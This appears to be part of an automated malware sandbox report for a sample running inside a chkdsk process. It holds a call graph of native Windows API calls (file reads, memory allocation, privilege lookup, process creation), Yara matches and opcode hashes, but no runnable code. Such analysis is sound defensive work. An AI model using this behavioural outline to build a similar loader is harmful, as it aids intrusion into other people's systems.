LdrLoadDll 81757 c9c61 81756->81757 81758 cf170 81757->81758 81759 cf189 81758->81759 82147 cb030 81759->82147 81761 cf19c 82151 da1a0 81761->82151 81765 cf1c2 81768 cf1ed 81765->81768 82157 da220 81765->82157 81767 da450 2 API calls 81769 c9d55 81767->81769 81768->81767 81769->81685 81792 da5c0 81770->81792 81774 db289 81773->81774 81805 d4a40 81774->81805 81776 db2a1 81777 db2aa 81776->81777 81844 db0b0 81776->81844 81777->81746 81779 db2be 81779->81777 81862 d9ec0 81779->81862 82116 c7ea0 81784->82116 81786 c9ac1 81786->81748 81787 c9aba 81787->81786 82129 c8160 81787->82129 81790->81740 81791->81750 81793 d8a45 81792->81793 81795 daf20 81792->81795 81793->81744 81796 daf30 81795->81796 81797 daf52 81795->81797 81799 d4e40 81796->81799 81797->81793 81800 d4e5a 81799->81800 81802 d4e4e 81799->81802 81800->81797 81802->81800 81804 d52c0 LdrLoadDll 81802->81804 81803 d4fac 81803->81797 81804->81803 81806 d4d75 81805->81806 81807 d4a54 81805->81807 81806->81776 81807->81806 81870 d9c10 81807->81870 81810 d4b80 81873 da320 81810->81873 81811 d4b63 81930 da420 LdrLoadDll 81811->81930 81814 d4b6d 81814->81776 81815 d4ba7 81816 dbd80 2 API calls 81815->81816 81819 d4bb3 81816->81819 81817 d4d39 81820 da450 2 API calls 81817->81820 81818 d4d4f 81939 d4780 LdrLoadDll NtReadFile NtClose 81818->81939 81819->81814 81819->81817 81819->81818 81824 d4c42 81819->81824 81821 d4d40 81820->81821 81821->81776 81823 d4d62 81823->81776 81825 d4ca9 81824->81825 81827 d4c51 81824->81827 81825->81817 81826 d4cbc 81825->81826 81932 da2a0 81826->81932 81829 d4c6a 81827->81829 81830 d4c56 81827->81830 81833 d4c6f 81829->81833 81834 d4c87 81829->81834 81931 d4640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 81830->81931 81876 d46e0 81833->81876 81834->81821 81888 d4400 81834->81888 81836 d4c60 81836->81776 81838 d4d1c 81936 da450 81838->81936 81839 d4c7d 81839->81776 81842 d4c9f 81842->81776 81843 d4d28 81843->81776 81845 db0c1 81844->81845 81846 db0d3 81845->81846 81957 dbd00 81845->81957 81846->81779 81848 db0f4 81960 d4060 81848->81960 81850 db140 81850->81779 81851 db117 81851->81850 81852 d4060 3 API calls 81851->81852 81853 db139 81852->81853 81853->81850 81992 d5380 81853->81992 81855 db1ca 81856 db1da 81855->81856 82086 daec0 LdrLoadDll 81855->82086 82002 dad30 81856->82002 81859 db208 82081 d9e80 81859->82081 81863 d9edc 81862->81863 81864 daf20 LdrLoadDll 81862->81864 82112 200fae8 LdrInitializeThunk 81863->82112 81864->81863 81865 d9ef7 81867 dbd80 81865->81867 82113 da630 81867->82113 81869 db319 81869->81746 81871 daf20 LdrLoadDll 81870->81871 81872 d4b34 81870->81872 81871->81872 81872->81810 81872->81811 81872->81814 81874 daf20 LdrLoadDll 81873->81874 81875 da33c NtCreateFile 81874->81875 81875->81815 81877 d46fc 81876->81877 81878 da2a0 LdrLoadDll 81877->81878 81879 d471d 81878->81879 81880 d4738 81879->81880 81881 d4724 81879->81881 81883 da450 2 API calls 81880->81883 81882 da450 2 API calls 81881->81882 81884 d472d 81882->81884 81885 d4741 81883->81885 81884->81839 81940 dbf90 LdrLoadDll RtlAllocateHeap 81885->81940 81887 d474c 81887->81839 81889 d447e 81888->81889 81890 d444b 81888->81890 81891 d45c9 81889->81891 81895 d449a 81889->81895 81892 da2a0 LdrLoadDll 81890->81892 81893 da2a0 LdrLoadDll 81891->81893 81894 d4466 81892->81894 81898 d45e4 81893->81898 81896 da450 2 API calls 81894->81896 81897 da2a0 LdrLoadDll 81895->81897 81899 d446f 81896->81899 81900 d44b5 81897->81900 81953 da2e0 LdrLoadDll 81898->81953 81899->81842 81902 d44bc 81900->81902 81903 d44d1 81900->81903 81905 da450 2 API calls 81902->81905 81906 d44ec 81903->81906 81907 d44d6 81903->81907 81904 d461e 81908 da450 2 API calls 81904->81908 81909 d44c5 81905->81909 81915 d44f1 81906->81915 81941 dbf50 81906->81941 81910 da450 2 API calls 81907->81910 81911 d4629 81908->81911 81909->81842 81912 d44df 81910->81912 81911->81842 81912->81842 81924 d4503 81915->81924 81944 da3d0 81915->81944 81916 d4557 81917 d456e 81916->81917 81952 da260 LdrLoadDll 81916->81952 81919 d458a 81917->81919 81920 d4575 81917->81920 81921 da450 2 API calls 81919->81921 81922 da450 2 API calls 81920->81922 81923 d4593 81921->81923 81922->81924 81925 d45bf 81923->81925 81947 dbb50 81923->81947 81924->81842 81925->81842 81927 d45aa 81928 dbd80 2 API calls 81927->81928 81929 d45b3 81928->81929 81929->81842 81930->81814 81931->81836 81933 d4d04 81932->81933 81934 daf20 LdrLoadDll 81932->81934 81935 da2e0 LdrLoadDll 81933->81935 81934->81933 81935->81838 81937 da46c NtClose 81936->81937 81938 daf20 LdrLoadDll 81936->81938 81937->81843 81938->81937 81939->81823 81940->81887 81943 dbf68 81941->81943 81954 da5f0 81941->81954 81943->81915 81945 da3ec NtReadFile 81944->81945 81946 daf20 LdrLoadDll 81944->81946 81945->81916 81946->81945 81948 dbb5d 81947->81948 81949 dbb74 81947->81949 81948->81949 81950 dbf50 2 API calls 81948->81950 81949->81927 81951 dbb8b 81950->81951 81951->81927 81952->81917 81953->81904 81955 daf20 LdrLoadDll 81954->81955 81956 da60c RtlAllocateHeap 81955->81956 81956->81943 81958 dbd2d 81957->81958 82087 da500 81957->82087 81958->81848 81961 d4071 81960->81961 81962 d4079 81960->81962 81961->81851 81963 d434c 81962->81963 82090 dcef0 81962->82090 81963->81851 81965 d40cd 81966 dcef0 2 API calls 81965->81966 81969 d40d8 81966->81969 81967 d4126 81970 dcef0 2 API calls 81967->81970 81969->81967 81971 dd020 3 API calls 81969->81971 82104 dcf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 81969->82104 81973 d413a 81970->81973 81971->81969 81972 d4197 81974 dcef0 2 API calls 81972->81974 81973->81972 82095 dd020 81973->82095 81976 d41ad 81974->81976 81977 d41ea 81976->81977 81980 dd020 3 API calls 81976->81980 81978 dcef0 2 API calls 81977->81978 81979 d41f5 81978->81979 81981 dd020 3 API calls 81979->81981 81988 d422f 81979->81988 81980->81976 81981->81979 81984 dcf50 2 API calls 81985 d432e 81984->81985 81986 dcf50 2 API calls 81985->81986 81987 d4338 81986->81987 81989 dcf50 2 API calls 81987->81989 82101 dcf50 81988->82101 81990 d4342 81989->81990 81991 dcf50 2 API calls 81990->81991 81991->81963 81993 d5391 81992->81993 81994 d4a40 8 API calls 81993->81994 81995 d53a7 81994->81995 81996 d53f5 81995->81996 81997 d53e2 81995->81997 82001 d53fa 81995->82001 81999 dbd80 2 API calls 81996->81999 81998 dbd80 2 API calls 81997->81998 82000 d53e7 81998->82000 81999->82001 82000->81855 82001->81855 82105 dabf0 82002->82105 82005 dabf0 LdrLoadDll 82006 dad4d 82005->82006 82007 dabf0 LdrLoadDll 82006->82007 82008 dad56 82007->82008 82009 dabf0 LdrLoadDll 82008->82009 82010 dad5f 82009->82010 82011 dabf0 LdrLoadDll 82010->82011 82012 dad68 82011->82012 82013 dabf0 LdrLoadDll 82012->82013 82014 dad71 82013->82014 82015 dabf0 LdrLoadDll 82014->82015 82016 dad7d 82015->82016 82017 dabf0 LdrLoadDll 82016->82017 82018 dad86 82017->82018 82019 dabf0 LdrLoadDll 82018->82019 82020 dad8f 82019->82020 82021 dabf0 LdrLoadDll 82020->82021 82022 dad98 82021->82022 82023 dabf0 LdrLoadDll 82022->82023 82024 dada1 82023->82024 82025 dabf0 LdrLoadDll 82024->82025 82026 dadaa 82025->82026 82027 dabf0 LdrLoadDll 82026->82027 82028 dadb6 82027->82028 82029 dabf0 LdrLoadDll 82028->82029 82030 dadbf 82029->82030 82031 dabf0 LdrLoadDll 82030->82031 82032 dadc8 82031->82032 82033 dabf0 LdrLoadDll 82032->82033 82034 dadd1 82033->82034 82035 dabf0 LdrLoadDll 82034->82035 82036 dadda 82035->82036 82037 dabf0 LdrLoadDll 82036->82037 82038 dade3 82037->82038 82039 dabf0 LdrLoadDll 82038->82039 82040 dadef 82039->82040 82041 dabf0 LdrLoadDll 82040->82041 82042 dadf8 82041->82042 82043 dabf0 LdrLoadDll 82042->82043 82044 dae01 82043->82044 82045 dabf0 LdrLoadDll 82044->82045 82046 dae0a 82045->82046 82047 dabf0 LdrLoadDll 82046->82047 82048 dae13 82047->82048 82049 dabf0 LdrLoadDll 82048->82049 82050 dae1c 82049->82050 82051 dabf0 LdrLoadDll 82050->82051 82052 dae28 82051->82052 82053 dabf0 LdrLoadDll 82052->82053 82054 dae31 82053->82054 82055 dabf0 LdrLoadDll 82054->82055 82056 dae3a 82055->82056 82057 dabf0 LdrLoadDll 82056->82057 82058 dae43 82057->82058 82059 dabf0 LdrLoadDll 82058->82059 82060 dae4c 82059->82060 82061 dabf0 LdrLoadDll 82060->82061 82062 dae55 82061->82062 82063 dabf0 LdrLoadDll 82062->82063 82064 dae61 82063->82064 82065 dabf0 LdrLoadDll 82064->82065 82066 dae6a 82065->82066 82067 dabf0 LdrLoadDll 82066->82067 82068 dae73 82067->82068 82069 dabf0 LdrLoadDll 82068->82069 82070 dae7c 82069->82070 82071 dabf0 LdrLoadDll 82070->82071 82072 dae85 82071->82072 82073 dabf0 LdrLoadDll 82072->82073 82074 dae8e 82073->82074 82075 dabf0 LdrLoadDll 82074->82075 82076 dae9a 82075->82076 82077 dabf0 LdrLoadDll 82076->82077 82078 daea3 82077->82078 82079 dabf0 LdrLoadDll 82078->82079 82080 daeac 82079->82080 82080->81859 82082 daf20 LdrLoadDll 82081->82082 82083 d9e9c 82082->82083 82111 200fdc0 LdrInitializeThunk 82083->82111 82084 d9eb3 82084->81779 82086->81856 82088 daf20 LdrLoadDll 82087->82088 82089 da51c NtAllocateVirtualMemory 82088->82089 82089->81958 82091 dcf06 82090->82091 82092 dcf00 82090->82092 82093 dbf50 2 API calls 82091->82093 82092->81965 82094 dcf2c 82093->82094 82094->81965 82096 dcf90 82095->82096 82097 dcfed 82096->82097 82098 dbf50 2 API calls 82096->82098 82097->81973 82099 dcfca 82098->82099 82100 dbd80 2 API calls 82099->82100 82100->82097 82102 dbd80 2 API calls 82101->82102 82103 d4324 82102->82103 82103->81984 82104->81969 82106 dac0b 82105->82106 82107 d4e40 LdrLoadDll 82106->82107 82108 dac2b 82107->82108 82109 d4e40 LdrLoadDll 82108->82109 82110 dacd7 82108->82110 82109->82110 82110->82005 82111->82084 82112->81865 82114 da64c RtlFreeHeap 82113->82114 82115 daf20 LdrLoadDll 82113->82115 82114->81869 82115->82114 82117 c7eab 82116->82117 82118 c7eb0 82116->82118 82117->81787 82119 dbd00 2 API calls 82118->82119 82125 c7ed5 82119->82125 82120 c7f38 82120->81787 82121 d9e80 2 API calls 82121->82125 82122 c7f3e 82124 c7f64 82122->82124 82126 da580 2 API calls 82122->82126 82124->81787 82125->82120 82125->82121 82125->82122 82127 dbd00 2 API calls 82125->82127 82132 da580 82125->82132 82128 c7f55 82126->82128 82127->82125 82128->81787 82130 c817e 82129->82130 82131 da580 2 API calls 82129->82131 82130->81748 82131->82130 82133 daf20 LdrLoadDll 82132->82133 82134 da59c 82133->82134 82137 200fb68 LdrInitializeThunk 82134->82137 82135 da5b3 82135->82125 82137->82135 82139 db583 82138->82139 82142 cace0 82139->82142 82141 c9c4b 82141->81756 82144 cad04 82142->82144 82143 cad0b 82143->82141 82144->82143 82145 cad57 82144->82145 82146 cad40 LdrLoadDll 82144->82146 82145->82141 82146->82145 82148 cb053 82147->82148 82149 cb0d0 82148->82149 82162 d9c50 LdrLoadDll 82148->82162 82149->81761 82152 daf20 LdrLoadDll 82151->82152 82153 cf1ab 82152->82153 82153->81769 82154 da790 82153->82154 82155 da7af LookupPrivilegeValueW 82154->82155 82156 daf20 LdrLoadDll 82154->82156 82155->81765 82156->82155 82158 daf20 LdrLoadDll 82157->82158 82159 da23c 82158->82159 82163 200fed0 LdrInitializeThunk 82159->82163 82160 da25b 82160->81768 82162->82149 82163->82160 82165 cb1e0 82164->82165 82166 cb030 LdrLoadDll 82165->82166 82167 cb1f4 82166->82167 82167->81701 82169 caf24 82168->82169 82241 d9c50 LdrLoadDll 82169->82241 82171 caf5e 82171->81703 82173 cf39c 82172->82173 82174 cb1b0 LdrLoadDll 82173->82174 82175 cf3ae 82174->82175 82242 cf280 82175->82242 82178 cf3c9 82180 cf3d4 82178->82180 82182 da450 2 API calls 82178->82182 82179 cf3e1 82181 cf3f2 82179->82181 82183 da450 2 API calls 82179->82183 82180->81706 82181->81706 82182->82180 82183->82181 82185 cf42c 82184->82185 82262 cb2a0 82185->82262 82187 cf43e 82188 cf280 3 API calls 82187->82188 82189 cf44f 82188->82189 82190 cf459 82189->82190 82191 cf471 82189->82191 82192 cf464 82190->82192 82194 da450 2 API calls 82190->82194 82193 cf482 82191->82193 82195 da450 2 API calls 82191->82195 82192->81708 82193->81708 82194->82192 82195->82193 82197 cca96 82196->82197 82198 ccaa0 82196->82198 82197->81717 82199 caf00 LdrLoadDll 82198->82199 82200 ccb3e 82199->82200 82201 ccb64 82200->82201 82202 cb030 LdrLoadDll 82200->82202 82201->81717 82203 ccb80 82202->82203 82204 d4a40 8 API calls 82203->82204 82205 ccbd5 82204->82205 82205->81717 82207 cd636 82206->82207 82208 cb030 LdrLoadDll 82207->82208 82209 cd64a 82208->82209 82266 cd300 82209->82266 82211 c908b 82212 ccbf0 82211->82212 82213 ccc16 82212->82213 82214 cb030 LdrLoadDll 82213->82214 82215 ccc99 82213->82215 82214->82215 82216 cb030 LdrLoadDll 82215->82216 82217 ccd06 82216->82217 82218 caf00 LdrLoadDll 82217->82218 82219 ccd6f 82218->82219 82220 cb030 LdrLoadDll 82219->82220 82221 cce1f 82220->82221 82221->81729 82295 cf6c0 82222->82295 82224 c8f25 82224->81688 82225 c8d14 82225->82224 82300 d4390 82225->82300 82227 c8d70 82227->82224 82303 c8ab0 82227->82303 82230 dcef0 2 API calls 82231 c8db2 82230->82231 82232 dd020 3 API calls 82231->82232 82236 c8dc7 82232->82236 82233 c7ea0 4 API calls 82233->82236 82236->82224 82236->82233 82237 cc7a0 18 API calls 82236->82237 82238 c8160 2 API calls 82236->82238 82308 cf660 82236->82308 82312 cf070 21 API calls 82236->82312 82237->82236 82238->82236 82239->81710 82240->81735 82241->82171 82243 cf350 82242->82243 82244 cf29a 82242->82244 82243->82178 82243->82179 82245 cb030 LdrLoadDll 82244->82245 82246 cf2bc 82245->82246 82252 d9f00 82246->82252 82248 cf2fe 82256 d9f40 82248->82256 82251 da450 2 API calls 82251->82243 82253 d9f16 82252->82253 82254 daf20 LdrLoadDll 82253->82254 82255 d9f1c 82254->82255 82255->82248 82257 d9f5c 82256->82257 82258 daf20 LdrLoadDll 82256->82258 82261 20107ac LdrInitializeThunk 82257->82261 82258->82257 82259 cf344 82259->82251 82261->82259 82263 cb2aa 82262->82263 82264 cb030 LdrLoadDll 82263->82264 82265 cb303 82264->82265 82265->82187 82267 cd317 82266->82267 82275 cf700 82267->82275 82271 cd38b 82272 cd392 82271->82272 82286 da260 LdrLoadDll 82271->82286 82272->82211 82274 cd3a5 82274->82211 82276 cf725 82275->82276 82287 c81a0 82276->82287 82278 cd35f 82283 da6a0 82278->82283 82279 d4a40 8 API calls 82281 cf749 82279->82281 82281->82278 82281->82279 82282 dbd80 2 API calls 82281->82282 82294 cf540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 82281->82294 82282->82281 82284 da6bf CreateProcessInternalW 82283->82284 82285 daf20 LdrLoadDll 82283->82285 82284->82271 82285->82284 82286->82274 82288 c829f 82287->82288 82289 c81b5 82287->82289 82288->82281 82289->82288 82290 d4a40 8 API calls 82289->82290 82291 c8222 82290->82291 82292 dbd80 2 API calls 82291->82292 82293 c8249 82291->82293 82292->82293 82293->82281 82294->82281 82296 cf6df 82295->82296 82297 d4e40 LdrLoadDll 82295->82297 82298 cf6ed 82296->82298 82299 cf6e6 SetErrorMode 82296->82299 82297->82296 82298->82225 82299->82298 82302 d43b6 82300->82302 82313 cf490 82300->82313 82302->82227 82304 dbd00 2 API calls 82303->82304 82307 c8ad5 82303->82307 82304->82307 82305 c8cea 82305->82230 82307->82305 82332 d9840 82307->82332 82309 cf673 82308->82309 82380 d9e50 82309->82380 82312->82236 82314 cf4ad 82313->82314 82320 d9f80 82314->82320 82317 cf4f5 82317->82302 82321 d9f9c 82320->82321 82322 daf20 LdrLoadDll 82320->82322 82330 200ffb4 LdrInitializeThunk 82321->82330 82322->82321 82323 cf4ee 82323->82317 82325 d9fd0 82323->82325 82326 daf20 LdrLoadDll 82325->82326 82327 d9fec 82326->82327 82331 200fc60 LdrInitializeThunk 82327->82331 82328 cf51e 82328->82302 82330->82323 82331->82328 82333 dbf50 2 API calls 82332->82333 82334 d9857 82333->82334 82353 c9310 82334->82353 82336 d9872 82337 d9899 82336->82337 82338 d98b0 82336->82338 82339 dbd80 2 API calls 82337->82339 82340 dbd00 2 API calls 82338->82340 82341 d98a6 82339->82341 82342 d98ea 82340->82342 82341->82305 82343 dbd00 2 API calls 82342->82343 82344 d9903 82343->82344 82350 d9ba4 82344->82350 82359 dbd40 LdrLoadDll 82344->82359 82346 d9b89 82347 d9b90 82346->82347 82346->82350 82348 dbd80 2 API calls 82347->82348 82349 d9b9a 82348->82349 82349->82305 82351 dbd80 2 API calls 82350->82351 82352 d9bf9 82351->82352 82352->82305 82354 c9335 82353->82354 82355 cace0 LdrLoadDll 82354->82355 82356 c9368 82355->82356 82358 c938d 82356->82358 82360 ccf10 82356->82360 82358->82336 82359->82346 82361 ccf3c 82360->82361 82362 da1a0 LdrLoadDll 82361->82362 82363 ccf55 82362->82363 82364 ccf5c 82363->82364 82371 da1e0 82363->82371 82364->82358 82368 ccf97 82369 da450 2 API calls 82368->82369 82370 ccfba 82369->82370 82370->82358 82372 daf20 LdrLoadDll 82371->82372 82373 da1fc 82372->82373 82379 200fbb8 LdrInitializeThunk 82373->82379 82374 ccf7f 82374->82364 82376 da7d0 82374->82376 82377 daf20 LdrLoadDll 82376->82377 82378 da7ef 82377->82378 82378->82368 82379->82374 82381 daf20 LdrLoadDll 82380->82381 82382 d9e6c 82381->82382 82385 200fd8c LdrInitializeThunk 82382->82385 82383 cf69e 82383->82236 82385->82383 82387 d9040 82388 dbd00 2 API calls 82387->82388 82390 d907b 82387->82390 82388->82390 82389 d915c 82390->82389 82391 cace0 LdrLoadDll 82390->82391 82392 d90b1 82391->82392 82393 d4e40 LdrLoadDll 82392->82393 82395 d90cd 82393->82395 82394 d90e0 Sleep 82394->82395 82395->82389 82395->82394 82398 d8c60 LdrLoadDll 82395->82398 82399 d8e70 LdrLoadDll 82395->82399 82398->82395 82399->82395

                                  Executed Functions

                                  Function 000DA3CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 243 da3ca-da3ce 244 da426-da449 call daf20 243->244 245 da3d1-da419 call daf20 NtReadFile 243->245
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000DA415
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !J$mK
                                  • API String ID: 2738559852-2694220420
                                  • Opcode ID: cc1a5caa438b4077c69265ee7044e14f5808b96c11d54c474f95ad02f58022d0
                                  • Instruction ID: f804c8201bb02d07c3e25c7b8e37c9ede7840616410246d89af2f2e949d89030
                                  • Opcode Fuzzy Hash: cc1a5caa438b4077c69265ee7044e14f5808b96c11d54c474f95ad02f58022d0
                                  • Instruction Fuzzy Hash: 590129B2200214AFCB14DF98DC85EEB77ADEF8C714F058659BA1D97241C630E911CBB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 291 da320-da371 call daf20 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000DA36D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: 1bfa10e3faee7791774820e63c42ca3d0b2d757105d0aa3ec970af5c21c03481
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: A8F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA3D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 da3d0-da3e6 295 da3ec-da419 NtReadFile 294->295 296 da3e7 call daf20 294->296 296->295
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000DA415
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !J
                                  • API String ID: 2738559852-3001626359
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: ad74e15f3fd307556c897afc5ac714aa2a4d6fa41f11e1eb9c28cc7018f46207
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: 0EF0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158259BA1D97241D630E8118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA450 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 306 da450-da466 307 da46c-da479 NtClose 306->307 308 da467 call daf20 306->308 308->307
                                  APIs
                                  • NtClose.NTDLL(@M,?,?,000D4D40,00000000,FFFFFFFF), ref: 000DA475
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID: @M
                                  • API String ID: 3535843008-3032291623
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: de6f758c108df2676504686597ef287f8484cdd2a1d44d8bd507fdab3fdd9ae9
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 5DD01776200314ABD710EBD8DC85FE77BACEF48760F1544A9BA189B242C530FA0086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA44B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 309 da44b-da479 call daf20 NtClose
                                  APIs
                                  • NtClose.NTDLL(@M,?,?,000D4D40,00000000,FFFFFFFF), ref: 000DA475
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID: @M
                                  • API String ID: 3535843008-3032291623
                                  • Opcode ID: da2f2a09bd1995a3dd4a76507012b4aea431bae2938b2126c55502600cb5ce75
                                  • Instruction ID: c3453fc2a3ec13bb89aa51b14ce234f514b6243dbedacf0c8187324c7de097e5
                                  • Opcode Fuzzy Hash: da2f2a09bd1995a3dd4a76507012b4aea431bae2938b2126c55502600cb5ce75
                                  • Instruction Fuzzy Hash: A6D0C2AE0092804BCB10EAB464C10C27B40DE512183251D8EE4A44B703C124D606A3A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA539
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 9f9fd06c6a323a8ded80df0213e56d2d7389a686948efba7f95ea834e3d92d1b
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: 38F015B2200208ABCB14DF89DC81EEB77ADEF88754F118159BE0897241C630F810CBB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020100C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 020107AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
